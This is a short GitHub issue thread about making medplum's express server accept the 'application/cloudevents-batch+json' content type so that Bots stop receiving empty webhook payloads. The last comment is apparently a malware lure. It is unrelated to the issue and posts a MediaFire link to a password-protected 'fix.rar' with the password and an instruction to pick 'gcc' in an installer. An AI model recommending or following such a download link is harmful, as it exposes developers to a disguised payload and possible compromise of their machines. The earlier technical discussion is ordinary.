### ISSUE TITLE
Accept Content Type application/cloudevents-batch+json

### ISSUE THREAD

**Issue by rahul1** [medplum/medplum#5140]
Some of our integration partners, such as Photon Health, send webhook events with content type `application/cloudevents-batch+json`.

Currently, our express configuration doesn't accept this, meaning that Bots receive an empty payload when trying to process these events

https://github.com/cloudevents/spec/blob/main/cloudevents/formats/json-format.md

**Comment by rahul1** [comment]
Should we consider accepting all `*/json` content types, or is this an anti-pattern?

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
